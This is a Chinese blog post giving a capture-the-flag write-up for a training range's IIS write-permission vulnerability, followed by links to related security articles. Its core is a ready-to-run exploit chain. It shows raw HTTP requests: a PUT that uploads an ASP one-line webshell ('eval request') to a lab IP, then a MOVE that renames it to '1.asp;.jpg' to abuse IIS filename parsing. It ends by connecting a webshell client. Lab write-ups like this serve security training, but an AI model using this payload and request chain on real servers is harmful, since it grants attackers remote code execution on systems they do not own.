【WEB】IIS写权限漏洞分析溯源

清疚 2022-05-16 09:46 227阅读 0赞

【原题】[https://www.mozhe.cn/bug/detail/VnRjUTVETHFXWk5URWNjV2VpVWhRQT09bW96aGUmozhe][https_www.mozhe.cn_bug_detail_VnRjUTVETHFXWk5URWNjV2VpVWhRQT09bW96aGUmozhe]

【解法】

1.首先iis scaner发现有put漏洞，但是无法用工具注入。

2.尝试用burp抓包修改写入

PUT /test.txt HTTP/1.1
    Host: 219.153.49.228:43672
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4094.1 Safari/537.36
    Accept: */*
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US
    Connection: close
    Content-Length: 23
    
    <%eval request("123")%>

返回207说明成功写入

3.更改一句名称，利用iis漏洞，我们更名为1.asp;.jpg

burp写入

MOVE /test.txt HTTP/1.1
    Host: 219.153.49.228:43672
    Destination: /1.asp;.jpg
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4094.1 Safari/537.36
    Accept: */*
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US
    Connection: close
    Content-Length: 23
    
    <%eval request("123")%>

虽然返回207 Multi-Status， 但是这个文件确实可以访问，菜刀连接即可。

[https_www.mozhe.cn_bug_detail_VnRjUTVETHFXWk5URWNjV2VpVWhRQT09bW96aGUmozhe]: https://www.mozhe.cn/bug/detail/VnRjUTVETHFXWk5URWNjV2VpVWhRQT09bW96aGUmozhe

发表评论取消回复

表情：

评论列表（有 0 条评论，227人围观）

还没有评论，来说两句吧...

相关阅读

相关 Windows入侵溯源分析

目录溯源分析的目的溯源分析的思路系统补丁检测恶意用户排查系统日志排查

本是古典何须时尚/ 2023年10月06日 15:24/ 0 赞/ 51 阅读

相关提升权限_CVE-2020-1472 Netlogon权限提升漏洞分析

1. 漏洞简述 > 漏洞名称：Netlogon 权限提升漏洞 > > 漏洞编号：CVE-2020-1472 > > 漏洞类型：权限提升 > > CVSS评分：10

不念不忘少年蓝@/ 2023年01月06日 11:51/ 0 赞/ 168 阅读

相关安全漏洞--整数溢出漏洞(IOV)分析

一漏洞简介整数溢出漏洞(integer overflow)：在计算机中，整数分为无符号整数以及有符号整数两种。其中有符号整数会在最高位用0表示正数，用1表示

港控/mmm°/ 2022年06月17日 06:29/ 0 赞/ 378 阅读

相关权限漏洞：水平权限漏洞、垂直权限漏洞

水平权限漏洞是指Web应用程序接收到用户请求时，没有判断数据的所属人，或者在判断数据所属人时是从用户提交的参数中获取了userid，导致攻击者可以自行修改userid修改不属于

快来打我*/ 2022年05月21日 10:17/ 0 赞/ 265 阅读

相关【Web】内部文件上传系统漏洞分析溯源(获取shell）

【准备工具】 1.中国菜刀（可以去官网下载）官网：[http://www.maicaidao.co/][http_www.maicaidao.co] (不建议使用

约定不等于承诺〃/ 2022年05月18日 03:36/ 0 赞/ 189 阅读

相关【WEB】PHP代码分析溯源(第3题)

![image.png][] 在for 循环中是判断输入的字符是否有存在在1和9之间的数字如果不存在判断是否等于54975581388 等于则绕过即又不能等

╰+攻爆jí腚メ/ 2022年05月16日 10:14/ 0 赞/ 139 阅读

相关【WEB】WebShell代码分析溯源(第4题)

![70][] 查看到可以webshell后定位到源代码： ![70 1][] 这个的用法： get网址中传入 ?e=YXNzZXJ0 (arrest的bas

川长思鸟来/ 2022年05月16日 10:11/ 0 赞/ 167 阅读

相关【WEB】IIS写权限漏洞分析溯源

【原题】[https://www.mozhe.cn/bug/detail/VnRjUTVETHFXWk5URWNjV2VpVWhRQT09bW96aGUmozhe][https

清疚/ 2022年05月16日 09:46/ 0 赞/ 228 阅读

相关【WEB】PHP代码分析溯源（PHP文件包含）

【原题】 [https://www.mozhe.cn/bug/detail/T0YyUmZRa1paTkJNQ0JmVWt3Sm13dz09bW96aGUmozhe][h

灰太狼/ 2022年05月16日 07:58/ 0 赞/ 215 阅读

相关 Linux权限漏洞及其解决

文件权限漏洞，只要目录具有写的权限，其下的文件都可以强制写，所以不要轻易把写的权限给一个目录。以root用户登录创建目录bbbb

向右看齐/ 2021年11月26日 12:44/ 0 赞/ 271 阅读